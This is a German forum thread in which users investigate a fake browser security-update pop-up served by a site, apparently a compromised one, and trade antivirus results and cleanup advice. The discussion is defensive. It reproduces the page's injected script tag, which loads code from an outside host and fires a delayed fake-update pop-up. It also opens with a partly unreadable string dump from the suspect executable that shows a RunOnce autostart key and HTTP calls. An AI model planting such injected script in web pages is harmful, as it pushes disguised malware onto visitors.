ize S CreateFileA ¤WriteFile ëGetVolumeInformationA GetComputerNameA  Î FindClose Ò FindFirstFileA  óGetWindowsDirectoryA  ^GetFileAttributesA  ÈGetSystemTime ÁGetSystemDirectoryA Ü FindNextFileA ÀlstrcmpA  ”WideCharToMultiByte uMultiByteToWideChar ø FreeLibrary KERNEL32.dll  * CharNextA ßMessageBoxA ž DialogBoxParamA ë GetActiveWindow :GetMessageA PostMessageA  Ž DefWindowProcA  Æ EndDialog 8 CheckDlgButton  GetDlgItem  ;SendMessageA  ÀLoadImageA  ]GetSystemMetrics  £IsDlgButtonChecked  SSetDlgItemTextA †SetWindowTextA  zSetTimer  Ä EnableWindow  ÙwvsprintfA  ËLoadStringA €SetWindowLongA  ƒSetWindowPos  ÚMapWindowPoints ÿ GetClientRect ™SystemParametersInfoA tGetWindowRect jGetWindow EGetParent nGetWindowLongA  ZGetSysColor  CallWindowProcA MSetCursor wGetWindowTextA  xGetWindowTextLengthA  ¼UpdateWindow  “InvalidateRect  RedrawWindow  1ScreenToClient  @ ClientToScreen  & CharLowerA  ÌLoadStringW USER32.dll  : CreateFontIndirectA  DeleteObject  P CreateSolidBrush  •GetObjectA  ¥GetStockObject  <SetTextColor  GDI32.dll GetTokenInformation ¬OpenProcessToken  ËRegCloseKey RegSetValueExA  ÑRegCreateKeyExA $GetUserNameA  > CloseServiceHandle  6 ChangeServiceConfigA  ¯OpenServiceA  OpenSCManagerA  g CreateWellKnownSid  ÷RegQueryValueExA  ìRegOpenKeyExA VLsaClose  SLsaAddAccountRights uLsaOpenPolicy ADVAPI32.dll  ShellExecuteA 	ShellExecuteExA SHELL32.dll ; CoInitialize  ole32.dll OLEAUT32.dll  ] InitCommonControlsEx  COMCTL32.dll  q InternetCrackUrlA d InternetCanonicalizeUrlA  i InternetCloseHandle š InternetReadFile  – InternetQueryDataAvailable  Y HttpSendRequestA  P HttpAddRequestHeadersA  U HttpOpenRequestA  o InternetConnectA  ’ InternetOpenA WININET.dll                                                                                                                                                                                 ˜@ ˜@ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/    ` @ T @ ÿÿÿÿ            x @ l @ ÿÿÿÿ                Y/¶(eÑ–  ø


&w=%d   &v=%d.%d.%d ?cid=   &d=%d   SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce   RunOnce .dll    .exe

ausy

Zitat von Boersenfeger

Týnec nad Sázavou
Das liegt heute definitiv nicht mehr in Deutschland....
Abgesehen davon, das du neben GData auch den Spyware Doctor installiert hast, einige Programme nicht standardpfadmäßig installiert hast, sehe ich nichts wesentliches. Was nichts heißen soll! Wenn Spyware Doctor zeitgleich mit GData Inhalte scannt, könnte es zu Problemen kommen. Ich kenne beide Programme nicht!
Beschere deinem Sohnemann ein eingeschränktes Windows Benutzerkonto, damit er solche Sperenzien, mit möglicherweise übleren Folgen, nicht nochmal machen kann.
BTW: Wie man Firefox richtig aktualisiert, kannst du in diesem Artikel nachlesen.

Das mag wohl sein, aber die Domain ist in Deutschland registriert, der Admin und Ansprechpartner auch in Deutschland.

Boersenfeger

Dann erstatte Anzeige, wenn du denen eine strafbare Handlung nachweisen kannst.

ausy

Zitat von Boersenfeger

Dann erstatte Anzeige, wenn du denen eine strafbare Handlung nachweisen kannst.

Dafür ist es zu kurzfristig, ich weiß im Moment nicht was manipuliert wurde. Man müßte die Datei einsenden.Tatsache ist, dass die Seite im Namen von Microsoft (IE) und Mozilla (Firefox) gefakte Sicherheitsupdates anbietet und das ist bereits nicht zuässig. Dein Vorredner PvW hat mit Avast etwas gefunden. Ausserdem das Hier gem. VirScanOrg:

Code

AVG 	8.5.850 	271.1.1/3292 	2010-12-02 Generic20.YSW
Dr.Web 	5.0.2.3300 	2010.12.02 	2010-12-02 Trojan.Webprefix.3

Wenn du meinst es wäre harmlos, dann kannst du es selber testen.

Boersenfeger

Zitat von ausy

Wenn du meinst es wäre harmlos, dann kannst du es selber testen.

Ich meine dies nicht. Getestet wurde ja bereits. Ergebnis: Dein Computer ist nach dem Fund nicht mehr vertrauenswürdig und du solltest nach Festplattenformatierung das System neu aufsetzen.
BTW: Ich erlaube mir mal einen erziehungstechnischen Rat/Hinweis zu geben. Ich weiß nicht, wie alt dein Sohn ist, aber beziehe ihn in die Problematik mit ein. Besser kann er nicht lernen....

ausy

Zitat von Boersenfeger

Ich meine dies nicht. Getestet wurde ja bereits. Ergebnis: Dein Computer ist nach dem Fund nicht mehr vertrauenswürdig und du solltest nach Festplattenformatierung das System neu aufsetzen.
BTW: Ich erlaube mir mal einen erziehungstechnischen Rat/Hinweis zu geben. Ich weiß nicht, wie alt dein Sohn ist, aber beziehe ihn in die Problematik mit ein. Besser kann er nicht lernen....

Ich bin ja nicht allein betroffen, die meisten merken es gar nicht. Es gibt aber auch Postings zu der gleichen Datei in vielen anderen Foren. Auf Grund der sehr vertrauenswürdigen Seite schöpft man zunächst kein Verdacht, ausserdem kommt das PopUp mit ca. 3 sec. Verzögerung, so dass zunächst auch kein Zusammenhang mit der Seite in Verbindung gebracht wird, ganz raffiniert. Das habe ich auch in dieser Form in den letzten 10 Jahren nicht erlebt, obwohl ich auf vielen dubiosen Seiten unterwegs bin. Mal sehen was AntiVir & Co Comp. dazu sagen werden. Ausserdem sollte man solchen Typen das Handwerk legen und nicht nur das System neu aufsetzen. Wenn jemand dir dein Auto zusammenfährt, dann rennst du auch nicht gleich los ein Neues zu kaufen. Hier der Seitenquelltext der Seite mit dem Firefox-Update:

HTML

<html>
<head>
<title>www.cjd-ewe-oldenburg.de</title>
<META name="keywords" content="http://www.litfass-wir-ueber-uns.de/ Fast fertig und schon online! ... Das CJD- EWE Jugenddorf Oldenburg in Niedersachsen ist eine Einrichtung des ...">
<META name="description" content="http://www.litfass-wir-ueber-uns.de/ Fast fertig und schon online! ... Das CJD- EWE Jugenddorf Oldenburg in Niedersachsen ist eine Einrichtung des ...">
<META name="abstract" content="http://www.litfass-wir-ueber-uns.de/ Fast fertig und schon online! ... Das CJD- EWE Jugenddorf Oldenburg in Niedersachsen ist eine Einrichtung des ...">
<meta name="googlebot" content="nosnippet">
<style>
body { overflow: hidden; }
</style> 
</head> 
<body style="margin:0px; padding:0px;" scrollbars="no" scrolling="no" onload="">
<script type="text/javascript" src="http://www.updates-browser.com/update_layer/layer_os.php?au=http%3A%2F%2Fparking.domport.de%2F%3Fdomain%3Dcjd-ewe-oldenburg.de"></script>
<script language="javascript">window.setTimeout('updatepop()',3000);</script>
<iframe width="100%" height="100%" src="http://www.google.de/search?q=www.cjd-ewe-oldenburg.de" border="0" frameborder="0" style="border:0px;"></iframe>


</body>
</html>

Alles anzeigen

PvW

Abends!

Vielleicht eine handvoll Bemerkungen:
Ich habe die Datei(en) lediglich mit einem "kleinen Besteck" ausgeführt.
Soll heißen: Sandboxie ohne weitere tiefere Betrachtungen.
Ich wage daher zunächst keine weiteren Vermutungen - unter anderem darüber,ob nicht da wer wen eingeladen hat.
Soetwas wäre einem tatsächlich abgeschotteten System vorbehalten, über welches ich derzeit nicht verfügen mag.

Interessant fand ich,daß weder die *zip.noch die Setup.exe hier bemängelt worden ist.
Und von Virustotal nur teilweise(s.o.)
Das etwas passiert,steht für mich außer Frage.
Was genau überlasse ich dann doch lieber berufeneren Köpfen.
Eine Seite,die einen solchen Download anbietet,bewußt oder unbewußt,läßt sich schwer tatsächlich greifen.
Dazu gibt's im Fx aber unter "Hilfe-> Betrugsversuch melden".
Nach Prüfung landen derlei Seiten u.a. in der Blacklist von Tante Google.
Ob das natürlich irgendwas bringt hinsichtlich der lokalen Gegebenheiten wage ich zu bezweifeln.

Gruß
P.

PvW

Nuja- überschnitten.
Was hat das in der Seite zu suchen?

Code

<script type="text/javascript" src="http://www.updates-browser.com/update_layer/layer_os.php?au=http%3A%2F%2Fparking.domport.de%2F%3Fdomain%3Dcjd-ewe-oldenburg.de"></script>
<script language="javascript">window.setTimeout('updatepop()',3000);</script>
<iframe width="100%" height="100%" src="http://www.google.de/search?q=www.cjd-ewe-oldenburg.de" border="0" frameborder="0" style="border:0px;"></iframe>

Banane.
Besuch bekommen.

Gruß
P.

ausy

Zitat von PvW

Abends!
Vielleicht eine handvoll Bemerkungen:
.....................
Nach Prüfung landen derlei Seiten u.a. in der Blacklist von Tante Google.
Ob das natürlich irgendwas bringt hinsichtlich der lokalen Gegebenheiten wage ich zu bezweifeln.
Gruß
P.

Wie gesagt erstmal fällt ein Zusammenhang zwischen der Seite und dem Fake nicht auf, da es zeitverzögert kommt, wie sonst beim Firefoxupdate auch. Ich habe es nochmals getestet.
So sehen die Fakes aus:
[Blockierte Grafik: http://www.abload.de/img/explorerfakek5qj.jpg]
[Blockierte Grafik: http://www.abload.de/img/firefoxfakebna9.jpg]

Sobald mir das tatsächliche Risiko-Ergebnis vorliegt melde ich mich.

PvW

Hmmm.

Sieht für mich hier so aus,als wäre die Seite selbst betroffen?
Kein Grund :mrgreen: Deinen Agnaten die Leviten zu lesen.
Shit happens - auch eine sonst vertrauensvolle Seite kann Opfer werden /sein.
:-??
Gruß
P.

Estartu

Man achte mal auf die Logos. :mrgreen: Beide nicht Original.

PvW

Aber ganz nett gemacht.
Hier geht's doch um ebendas Fake.
Genau dat interessiert mich .

Grrr.
Gruß
P.

Fox2Fox

Es ist doch ganz einfach. Zumindest für mich, denn ich reagiere auf keinerlei solcher oder ähnlicher Meldungen. Wenn ich neugierig auf Updates bin, klicke ich über "Hilfe" auf "Nach Updates suchen". Ansonsten besuche ich Mozilla.